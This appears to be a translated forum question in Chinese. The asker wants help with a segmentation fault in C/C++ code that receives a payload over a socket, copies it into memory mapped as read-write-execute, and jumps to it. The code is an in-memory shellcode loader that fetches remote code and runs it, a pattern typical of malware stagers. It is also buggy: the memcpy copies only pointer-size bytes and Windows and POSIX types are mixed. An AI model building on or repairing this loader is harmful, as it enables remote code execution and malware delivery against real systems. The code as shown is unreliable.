我正在编写一个程序来在socket接收的内存上执行远程代码。我正在使用mmap生成内存空间,使用strncpy或memcpy将数据复制到内存。之后,我尝试执行它,我总是得到一个“分段错误:11”。这是代码:
#define DEFAULT_BUFLEN 1024
#define PAGE_EXECUTE_READWRITE 1
static const size_t SIZE = 1024;
#include <sys/mman.h>
#include <sys/types.h>
long int iResult = 1;
void error(const char *msg) {
perror(msg);
exit(1);
}
void execute(char *data) {
void *addr;
addr = mmap(0, SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, -1, 0);
if (addr == MAP_FAILED)
cout << "MAP fail" << endl;
//strncpy((char *)addr, argv, sizeof(char)*sizeof(argv));
memcpy(addr,data,sizeof(data));
((void (*)(void))addr)();
}
BOOL InMemoryRun(SOCKET ConnectSocketPE)
{
int recvbuflen = DEFAULT_BUFLEN;
char recvbuf[DEFAULT_BUFLEN];
cout << "[*] Starting Download Process" << endl;
recv(ConnectSocketPE, recvbuf, 1024, 0);
size_t a = atoi(recvbuf);
cout << "Shell size: " << a << endl;
sleep(2);
cout << "[*] Receiving Data...";
iResult = recv(ConnectSocketPE, recvbuf, recvbuflen, 0);
cout << "Done!"<<endl<<"[!] Starting exeutable..."<< endl;
execute(recvbuf);
return true;
}
提前致谢。